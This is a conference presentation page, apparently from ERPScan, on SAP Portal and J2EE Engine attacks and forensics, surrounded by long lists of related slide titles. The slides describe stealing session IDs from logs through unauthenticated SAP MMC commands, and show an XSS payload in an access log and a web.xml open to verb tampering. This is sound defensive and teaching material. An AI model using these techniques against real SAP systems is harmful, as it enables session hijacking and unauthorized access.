The latest changes to SAP cybersecurity landscape
ERPScan
 
Cyber-attacks to SAP Systems
Cyber-attacks to SAP SystemsCyber-attacks to SAP Systems
Cyber-attacks to SAP Systems
Onapsis Inc.
 
SAP security in figures
SAP security in figuresSAP security in figures
SAP security in figures
ERPScan
 
SAP Business Objects Attacks
SAP Business Objects AttacksSAP Business Objects Attacks
SAP Business Objects Attacks
Onapsis Inc.
 

What's hot (20)

SAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big businessSAP security landscape. How to protect(hack) your(their) big business
SAP security landscape. How to protect(hack) your(their) big business
 
Securing SAP in 5 steps
Securing SAP in 5 stepsSecuring SAP in 5 steps
Securing SAP in 5 steps
 
All your SAP passwords belong to us
All your SAP passwords belong to usAll your SAP passwords belong to us
All your SAP passwords belong to us
 
SAP (in)security: New and best
SAP (in)security: New and bestSAP (in)security: New and best
SAP (in)security: New and best
 
Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)
 
Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)
 
Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)
 
SAP portal: breaking and forensicating
SAP portal: breaking and forensicating SAP portal: breaking and forensicating
SAP portal: breaking and forensicating
 
Implementing SAP security in 5 steps
Implementing SAP security in 5 stepsImplementing SAP security in 5 steps
Implementing SAP security in 5 steps
 
Forgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application SystemsForgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application Systems
 
Attacking SAP users with sapsploit
Attacking SAP users with sapsploit Attacking SAP users with sapsploit
Attacking SAP users with sapsploit
 
Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)Oracle PeopleSoft applications are under attack (HITB AMS)
Oracle PeopleSoft applications are under attack (HITB AMS)
 
EAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applicationsEAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applications
 
5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applications5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applications
 
EAS-SEC Project
EAS-SEC ProjectEAS-SEC Project
EAS-SEC Project
 
Sap Security Hacks and Mitigation - Timeless Attacks
Sap Security Hacks and Mitigation - Timeless AttacksSap Security Hacks and Mitigation - Timeless Attacks
Sap Security Hacks and Mitigation - Timeless Attacks
 
The latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscapeThe latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscape
 
Cyber-attacks to SAP Systems
Cyber-attacks to SAP SystemsCyber-attacks to SAP Systems
Cyber-attacks to SAP Systems
 
SAP security in figures
SAP security in figuresSAP security in figures
SAP security in figures
 
SAP Business Objects Attacks
SAP Business Objects AttacksSAP Business Objects Attacks
SAP Business Objects Attacks
 

Similar to Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine

SAP security made easy
SAP security made easySAP security made easy
SAP security made easy
ERPScan
 
Top 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPTop 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAP
ERPScan
 
Architecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platformsArchitecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platforms
ERPScan
 
A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine. A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine.
ERPScan
 
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
ERPScan
 
Practical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applicationsPractical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applications
ERPScan
 
An easy way into your sap systems v3.0
An easy way into your sap systems v3.0An easy way into your sap systems v3.0
An easy way into your sap systems v3.0
Cyber Security Alliance
 
ciso-platform-annual-summit-2013-New Framework for ERP Security
ciso-platform-annual-summit-2013-New Framework for ERP Securityciso-platform-annual-summit-2013-New Framework for ERP Security
ciso-platform-annual-summit-2013-New Framework for ERP Security
Priyanka Aash
 
What CISOs should know about SAP security
What CISOs should know about SAP securityWhat CISOs should know about SAP security
What CISOs should know about SAP security
ERPScan
 
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP ForensicsOnapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis Inc.
 
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirementsMySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements
Olivier DASINI
 
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to usCONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
PROIDEA
 
Accelerate2022-Solving the SAP Security Gap through Application-aware Network...
Accelerate2022-Solving the SAP Security Gap through Application-aware Network...Accelerate2022-Solving the SAP Security Gap through Application-aware Network...
Accelerate2022-Solving the SAP Security Gap through Application-aware Network...
PeterSmetny1
 
SAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crimeSAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crime
Onapsis Inc.
 
Best Practices for a Complete Postgres Enterprise Architecture Setup
Best Practices for a Complete Postgres Enterprise Architecture SetupBest Practices for a Complete Postgres Enterprise Architecture Setup
Best Practices for a Complete Postgres Enterprise Architecture Setup
EDB
 
Exploiting Critical Attack Vectors to Gain Control of SAP Systems
Exploiting Critical Attack Vectors to Gain Control of SAP SystemsExploiting Critical Attack Vectors to Gain Control of SAP Systems
Exploiting Critical Attack Vectors to Gain Control of SAP Systems
Onapsis Inc.
 
SAP (In)Security: New and Best
SAP (In)Security: New and BestSAP (In)Security: New and Best
SAP (In)Security: New and Best
Positive Hack Days
 
ERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, SolutionsERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, Solutions
ERPScan
 
Top 5 .NET Challenges, Performance Monitoring Tips & Tricks
Top 5 .NET Challenges, Performance Monitoring Tips & TricksTop 5 .NET Challenges, Performance Monitoring Tips & Tricks
Top 5 .NET Challenges, Performance Monitoring Tips & Tricks
AppDynamics
 
CoreToEdge Company Presentation
CoreToEdge Company PresentationCoreToEdge Company Presentation
CoreToEdge Company Presentation
Core To Edge
 

Similar to Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine (20)

SAP security made easy
SAP security made easySAP security made easy
SAP security made easy
 
Top 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPTop 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAP
 
Architecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platformsArchitecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platforms
 
A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine. A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine.
 
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
 
Practical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applicationsPractical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applications
 
An easy way into your sap systems v3.0
An easy way into your sap systems v3.0An easy way into your sap systems v3.0
An easy way into your sap systems v3.0
 
ciso-platform-annual-summit-2013-New Framework for ERP Security
ciso-platform-annual-summit-2013-New Framework for ERP Securityciso-platform-annual-summit-2013-New Framework for ERP Security
ciso-platform-annual-summit-2013-New Framework for ERP Security
 
What CISOs should know about SAP security
What CISOs should know about SAP securityWhat CISOs should know about SAP security
What CISOs should know about SAP security
 
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP ForensicsOnapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
 
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirementsMySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements
 
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to usCONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
 
Accelerate2022-Solving the SAP Security Gap through Application-aware Network...
Accelerate2022-Solving the SAP Security Gap through Application-aware Network...Accelerate2022-Solving the SAP Security Gap through Application-aware Network...
Accelerate2022-Solving the SAP Security Gap through Application-aware Network...
 
SAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crimeSAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crime
 
Best Practices for a Complete Postgres Enterprise Architecture Setup
Best Practices for a Complete Postgres Enterprise Architecture SetupBest Practices for a Complete Postgres Enterprise Architecture Setup
Best Practices for a Complete Postgres Enterprise Architecture Setup
 
Exploiting Critical Attack Vectors to Gain Control of SAP Systems
Exploiting Critical Attack Vectors to Gain Control of SAP SystemsExploiting Critical Attack Vectors to Gain Control of SAP Systems
Exploiting Critical Attack Vectors to Gain Control of SAP Systems
 
SAP (In)Security: New and Best
SAP (In)Security: New and BestSAP (In)Security: New and Best
SAP (In)Security: New and Best
 
ERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, SolutionsERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, Solutions
 
Top 5 .NET Challenges, Performance Monitoring Tips & Tricks
Top 5 .NET Challenges, Performance Monitoring Tips & TricksTop 5 .NET Challenges, Performance Monitoring Tips & Tricks
Top 5 .NET Challenges, Performance Monitoring Tips & Tricks
 
CoreToEdge Company Presentation
CoreToEdge Company PresentationCoreToEdge Company Presentation
CoreToEdge Company Presentation
 

Recently uploaded

Hand Rolled Applicative User Validation Code Kata
Hand Rolled Applicative User Validation Code KataHand Rolled Applicative User Validation Code Kata
Hand Rolled Applicative User Validation Code Kata
Philip Schwarz
 
Energy consumption of Database Management - Florina Jonuzi
Energy consumption of Database Management - Florina JonuziEnergy consumption of Database Management - Florina Jonuzi
Energy consumption of Database Management - Florina Jonuzi
Green Software Development
 
Neo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
Neo4j - Product Vision and Knowledge Graphs - GraphSummit ParisNeo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
Neo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
Neo4j
 
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdfAutomated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
timtebeek1
 
Empowering Growth with Best Software Development Company in Noida - Deuglo
Empowering Growth with Best Software Development Company in Noida - DeugloEmpowering Growth with Best Software Development Company in Noida - Deuglo
Empowering Growth with Best Software Development Company in Noida - Deuglo
Deuglo Infosystem Pvt Ltd
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
OpenMetadata Community Meeting - 5th June 2024
OpenMetadata Community Meeting - 5th June 2024OpenMetadata Community Meeting - 5th June 2024
OpenMetadata Community Meeting - 5th June 2024
OpenMetadata
 
Oracle 23c New Features For DBAs and Developers.pptx
Oracle 23c New Features For DBAs and Developers.pptxOracle 23c New Features For DBAs and Developers.pptx
Oracle 23c New Features For DBAs and Developers.pptx
Remote DBA Services
 
E-commerce Development Services- Hornet Dynamics
E-commerce Development Services- Hornet DynamicsE-commerce Development Services- Hornet Dynamics
E-commerce Development Services- Hornet Dynamics
Hornet Dynamics
 
KuberTENes Birthday Bash Guadalajara - Introducción a Argo CD
KuberTENes Birthday Bash Guadalajara - Introducción a Argo CDKuberTENes Birthday Bash Guadalajara - Introducción a Argo CD
KuberTENes Birthday Bash Guadalajara - Introducción a Argo CD
rodomar2
 
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
mz5nrf0n
 
Using Query Store in Azure PostgreSQL to Understand Query Performance
Using Query Store in Azure PostgreSQL to Understand Query PerformanceUsing Query Store in Azure PostgreSQL to Understand Query Performance
Using Query Store in Azure PostgreSQL to Understand Query Performance
Grant Fritchey
 
UI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
UI5con 2024 - Boost Your Development Experience with UI5 Tooling ExtensionsUI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
UI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
Peter Muessig
 
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
Łukasz Chruściel
 
Microservice Teams - How the cloud changes the way we work
Microservice Teams - How the cloud changes the way we workMicroservice Teams - How the cloud changes the way we work
Microservice Teams - How the cloud changes the way we work
Sven Peters
 
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...Introducing Crescat - Event Management Software for Venues, Festivals and Eve...
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...
Crescat
 
A Study of Variable-Role-based Feature Enrichment in Neural Models of Code
A Study of Variable-Role-based Feature Enrichment in Neural Models of CodeA Study of Variable-Role-based Feature Enrichment in Neural Models of Code
A Study of Variable-Role-based Feature Enrichment in Neural Models of Code
Aftab Hussain
 
SMS API Integration in Saudi Arabia| Best SMS API Service
SMS API Integration in Saudi Arabia| Best SMS API ServiceSMS API Integration in Saudi Arabia| Best SMS API Service
SMS API Integration in Saudi Arabia| Best SMS API Service
Yara Milbes
 
Artificia Intellicence and XPath Extension Functions
Artificia Intellicence and XPath Extension FunctionsArtificia Intellicence and XPath Extension Functions
Artificia Intellicence and XPath Extension Functions
Octavian Nadolu
 
Unveiling the Advantages of Agile Software Development.pdf
Unveiling the Advantages of Agile Software Development.pdfUnveiling the Advantages of Agile Software Development.pdf
Unveiling the Advantages of Agile Software Development.pdf
brainerhub1
 

Recently uploaded (20)

Hand Rolled Applicative User Validation Code Kata
Hand Rolled Applicative User Validation Code KataHand Rolled Applicative User Validation Code Kata
Hand Rolled Applicative User Validation Code Kata
 
Energy consumption of Database Management - Florina Jonuzi
Energy consumption of Database Management - Florina JonuziEnergy consumption of Database Management - Florina Jonuzi
Energy consumption of Database Management - Florina Jonuzi
 
Neo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
Neo4j - Product Vision and Knowledge Graphs - GraphSummit ParisNeo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
Neo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
 
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdfAutomated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
 
Empowering Growth with Best Software Development Company in Noida - Deuglo
Empowering Growth with Best Software Development Company in Noida - DeugloEmpowering Growth with Best Software Development Company in Noida - Deuglo
Empowering Growth with Best Software Development Company in Noida - Deuglo
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
OpenMetadata Community Meeting - 5th June 2024
OpenMetadata Community Meeting - 5th June 2024OpenMetadata Community Meeting - 5th June 2024
OpenMetadata Community Meeting - 5th June 2024
 
Oracle 23c New Features For DBAs and Developers.pptx
Oracle 23c New Features For DBAs and Developers.pptxOracle 23c New Features For DBAs and Developers.pptx
Oracle 23c New Features For DBAs and Developers.pptx
 
E-commerce Development Services- Hornet Dynamics
E-commerce Development Services- Hornet DynamicsE-commerce Development Services- Hornet Dynamics
E-commerce Development Services- Hornet Dynamics
 
KuberTENes Birthday Bash Guadalajara - Introducción a Argo CD
KuberTENes Birthday Bash Guadalajara - Introducción a Argo CDKuberTENes Birthday Bash Guadalajara - Introducción a Argo CD
KuberTENes Birthday Bash Guadalajara - Introducción a Argo CD
 
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
 
Using Query Store in Azure PostgreSQL to Understand Query Performance
Using Query Store in Azure PostgreSQL to Understand Query PerformanceUsing Query Store in Azure PostgreSQL to Understand Query Performance
Using Query Store in Azure PostgreSQL to Understand Query Performance
 
UI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
UI5con 2024 - Boost Your Development Experience with UI5 Tooling ExtensionsUI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
UI5con 2024 - Boost Your Development Experience with UI5 Tooling Extensions
 
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
 
Microservice Teams - How the cloud changes the way we work
Microservice Teams - How the cloud changes the way we workMicroservice Teams - How the cloud changes the way we work
Microservice Teams - How the cloud changes the way we work
 
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...Introducing Crescat - Event Management Software for Venues, Festivals and Eve...
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...
 
A Study of Variable-Role-based Feature Enrichment in Neural Models of Code
A Study of Variable-Role-based Feature Enrichment in Neural Models of CodeA Study of Variable-Role-based Feature Enrichment in Neural Models of Code
A Study of Variable-Role-based Feature Enrichment in Neural Models of Code
 
SMS API Integration in Saudi Arabia| Best SMS API Service
SMS API Integration in Saudi Arabia| Best SMS API ServiceSMS API Integration in Saudi Arabia| Best SMS API Service
SMS API Integration in Saudi Arabia| Best SMS API Service
 
Artificia Intellicence and XPath Extension Functions
Artificia Intellicence and XPath Extension FunctionsArtificia Intellicence and XPath Extension Functions
Artificia Intellicence and XPath Extension Functions
 
Unveiling the Advantages of Agile Software Development.pdf
Unveiling the Advantages of Agile Software Development.pdfUnveiling the Advantages of Agile Software Development.pdf
Unveiling the Advantages of Agile Software Development.pdf
 

Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine

  • 1. Invest  in  security   to  secure  investments   Breaking,  forensica/ng  and   an/-­‐forensica/ng  SAP  Portal   and  J2EE  Engine  
  • 2. About  ERPScan   •  The   only   360-­‐degree   SAP   Security   solu8on   -­‐   ERPScan   Security   Monitoring  Suite  for  SAP   •  Leader  by  the  number  of  acknowledgements  from  SAP  (  150+  )   •  60+  presenta/ons  key  security  conferences  worldwide   •  25  Awards  and  nomina/ons   •  Research  team  -­‐  20  experts  with  experience  in    different  areas   of  security   •  Headquarters  in  Palo  Alto  (US)  and  Amsterdam  (EU)       2  
  • 3. Agenda   3   •  Why  SAP   •  Why  SAP  forensics   •  Why  it  is  hard   •  AJack  examples  and  forensics   –  Simple  aJacks   –  Advanced  aJacks   •  Defense   •  Conclusion  
  • 4. •  The  most  popular  business  applica8on   •  More  than  180000  customers  worldwide     •  74%  of  Forbes  500  run  SAP   •  300+  clients  in  South  Africa  by  2004   •  Almost  every  South  Africa  Government  runs  SAP     SAP   4  
  • 5. •  Espionage   –  TheX  of  Financial  Informa8on   –  Corporate  Secret  and  informa8on  theX   –  Supplier  and  Customer  list  theX   –  HR  data  theX     •  Sabotage   –  Denial  of  service   –  Tampering  with  financial  records   –  Access  to  technology  network  (SCADA)  by  trust  rela8ons   •  Fraud   –  False  transac8ons   –  Modifica8on  of  master  data     5   Why  SAP  Security?  
  • 7. 0 5 10 15 20 25 30 35 2006 2007 2008 2009 2010 2011 2012 •  BlackHat     •  HITB     •  Troopers     •  RSA     •  Source     •  ITWeb   •  DeepSec       Point  Source:  SAP  Security  in  Figures  2013   Is  it  popular?  Talks  about  SAP  security   7  
  • 9. 9   Is  it  relevant  for  South  Africa?   Simple  scan  for  SAP  routers  exposed  to  the  Internet:   •   63  SAP  Routers  found  in  the  default  port   •   27  SAP  Routers  with  medium-­‐cri8cal  issues   •   7  SAP  Routers  with  high-­‐cri8cal  issues   Number  of  Web-­‐based  SAP  Systems  found:   •   20  by  Shodan  
  • 10. 0 2 4 6 8 10 12 14 16 SAP Dispatcher SAP MMC SAP Message Server SAP HostControl SAP ITS Agate SAP Message Server httpd World hJp://erpscan.com/wp-­‐content/uploads/2012/06/SAP-­‐Security-­‐in-­‐figures-­‐a-­‐global-­‐survey-­‐2007-­‐2011-­‐final.pdf     10   What  about  other  services?  
  • 11. *  This  aJack  has  not  been  confirmed  by  the  customer  nor  by  the  police  authori8es  in  Greece   inves8ga8ng  the  case.  SAP  does  not  have  any  indica8on  that  it  happened.   Now, it adds, “We gained full access to the Greek Ministry of Finance. Those funky IBM servers don't look so safe now, do they...” Anonymous claims to have a “sweet 0day SAP exploit”, and the group intends to “sploit the hell out of it.” 11   Who  actually  tried  to  break  SAP?  
  • 12. 12   What  about  unpublished  threats?   •  Companies  are  not  interested  in  publishing  informa8on  about   their  breaches   •  There  are  a  lot  of  internal  breaches  thanks  to  unnecessarily   given  authoriza8ons  (An  employee  by  mistake  buys  hundreds  of   excavators  instead  of  ten)   •  There  are  known  stories  about  backdoors  leX  by  developers  in   custom  ABAP  code   •  How  can  you  be  sure  that,  if  a  breach  occurs,  you  can  find   evidence?  
  • 13. hJp://erpscan.com/wp-­‐content/uploads/2012/06/SAP-­‐Security-­‐in-­‐figures-­‐a-­‐global-­‐survey-­‐2007-­‐2011-­‐final.pdf     13   SAP  Forensics   •  If  there  are  no  aJacks,  it  doesn’t  mean  anything   •  Companies  don’t  like  to  share  it   •  Companies  don’t  use  security  audit  ~10%   •  Even  if  used,  nobody  manages  it  ~5%   •  Even  if  managed,  no  correla8on  ~1%  
  • 14. 14   Typical  SAP  audit  op/ons     •  ICM  log  icm/HTTP/logging_0  70%     •  Security  audit  log  in  ABAP    10%   •  Table  access  logging  rec/client  4%   •  Message  Server  log  ms/audit  2%   •  SAP  Gateway  access  log    2%   •   %  of  companies  (based  on  our  security  assessments  and   product  implementa8ons)    
  • 15. hJp://erpscan.com/wp-­‐content/uploads/2012/06/SAP-­‐Security-­‐in-­‐figures-­‐a-­‐global-­‐survey-­‐2007-­‐2011-­‐final.pdf     What  do  we  see?   15   •  A  lot  of  research   •  Real  aJacks   •  Lack  of  logging  prac8ce   •  Many  vulnerabili8es  are  hard  to  close  →  We  need  to  monitor   them,  at  least    
  • 16. • Ideally, we should control everything, but this talk has limits, so let’s focus on the most critical areas What  do  we  need  to  monitor?     External  aYacks  on  SAP   16   • Awareness   AJack  users   and  SAP  GUI   • Secure  configura8on  and  patch  management    SAP  Router   • Disable  them   Exposed  SAP   services   • Too  much  issues  and  custom  configura8on   • May  be  0-­‐days   • Need  to  concentrate  on  this  area     SAP  Portal    
  • 17. 17   SAP  Portal   •  Point  of  web  access  to  SAP  systems   •  Point  of  web  access  to  other  corporate  systems   •  Way  for  aJackers  to  get  access  to  SAP  from  the  Internet  
  • 19. 19   Let’s  begin  the  technical  part   Full  logging  is  not  always  the  best  op/on   *not  only  because  of  system  highload  
  • 20. 20   Full  logging  is  not  always  the  best  op/on   •  SAP  MMC  –  centralized  system  management   •  Allowing  to  see  the  trace  and  log  messages   •  If  TRACE_LEVEL  =  3  →  JSESSIONIDs  are  stored  in  logs   •  <SID>DVEBMGS<id>j2eeclusterserver0logsystem userinterface.log   •  It’s  not  bad  if  you  only  use  it  some8mes  and  delete  logs  aXer   use,  but…  
  • 21. 21   But  some/mes     •  SAP  MMC  has  remote  commands   •  By  default,  many  commands  go  without  auth   •  Commands  are  simple  SOAP  requests   •  AJacker  can  read  logs  without  auth   •  And  read  JSESSIONIDs  stored  in  logs     •  And  use  them  for  logging  into  SAP  Portal  
  • 22. hJp://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm   22   Preven/on   •  Don’t  use  TRACE_LEVEL  =  3   •  Delete  traces  when  work  is  finished   •  Limit  access  to  dangerous  methods   •  Install  notes  927637  and  1439348   •  Mask  security-­‐sensi/ve  data  in  HTTP  access  log    
  • 23. •  The  HTTP  Provider  service  can  mask  security-­‐sensi8ve   URL  parameters,  cookies,  or  headers         •  By  default,  only  for  headers  listed  below   -  Path  Parameter:  jsessionid   -  Request  Parameters:  j_password,    j_username,   j_sap_password,  j_sap_again,  oldPassword,   confirmNewPassword,8cket   -  HTTP  Headers:  Authoriza8on,  Cookie  (JSESSIONID,   MYSAPSSO2)   hJp://help.sap.com/saphelp_nwce71/helpdata/en/79/77b142c444c96ae10000000a155106/content.htm   23   Masking  security-­‐sensi/ve  data  in  HTTP  log  
  • 24. SAP  AJacks  and   Forensics     *  Only  J2EE  engine     24  
  • 25. If  you  are  running  an  ABAP  +  Java  installa9on  of  Web  AS  with  SAP   Web  Dispatcher  as  a  load  balancing  solu9on,  you  can  safely  disable   logging  of  HTTP  requests  and  responses  on  J2EE  Engine,  and  use  the   corresponding  CLF  logs  of  SAP  Web  Dispatcher.  This  also  improves   the  HTTP  communica9on  performance.  The  only  drawback  of  using   the   Web   Dispatcher’s   CLF   logs   is   that   no   informa4on   is   available   about   the   user   execu4ng   the   request   (since   the   user   is   not   authen9cated   on   the   Web   Dispatcher,   but   on   the   J2EE   Engine   instead).         *Not  the  only….  There  are  many  complex  a>acks  with  POST   requests.   hJp://help.sap.com/saphelp_nw70ehp1/helpdata/en/ef/8cd7f51dfead42ab90537886104269/frameset.htm   25   SAP  Logging  
  • 26. hJp://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm   SAP  J2EE  Logging   26   •  Categories  of  system  events  recording:   -  System  –  all  system  related  security  and  administra8ve  logs.   -  Applica8ons  –  all  system  events  related  to  business  logic.   -  Performance  –  reserved  for  single  ac8vity  tracing.   •  Default  loca8on  of  these  files  in  your  file  system  usrsap<sid> <id>j2eecluster<node>log   •  The  developer  trace  files  of  the  Java  instance   -  <SID><instance  name>work   •  The  developer  trace  files  of  the  central  services   -  <SID><instance  name>work   -  <SID><instance  name>log   •  Java  server  logs   -  <SID><instance  name>j2eeclusterserver<n>log  
  • 27. •  Informa8on  disclosure  and  XSS   •       Verb  Tampering  via  HEAD   •       Invoker  servlet  via  GET   All  that  can  be  found  in  HTTP  headers.   j2eecluster<node>logsystemhttpaccess responses.trc   27   Simple  aYacks  
  • 28. hJp://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm   28   XSS:  Forensics   #Plain###192.168.192.26 : GET /irj/ servlet/prt/portal/prtroot/ com.sap.portal.usermanagement.admin.Us erMapping?systemid=MS_EXCHANGEaaaa%3C/ script%3E%3Cscript%3Ealert(%27xSS %27)%3C/script%3E HTTP/1.1 200 3968#  
  • 29. • <servlet> •  <servlet-name>CriticalAction</servlet-name> •  <servlet-class>com.sap.admin.Critical.Action</ servlet-class> • </servlet> • <servlet-mapping> •  <servlet-name>CriticalAction</</servlet-name> •  <url-pattern>/admin/critical</url-pattern> •  </servlet-mapping • <security-constraint> • <web-resource-collection> • <web-resource-name>Restrictedaccess</web-resource-name> • <url-pattern>/admin/*</url-pattern> • <http-method>GET</http-method> • </web-resource-collection> • <auth-constraint> <role-name>administrator</role-name> </auth-constraint> • </security-constraint> 29   Verb  Tampering:  Descrip/on  (web.xml)  
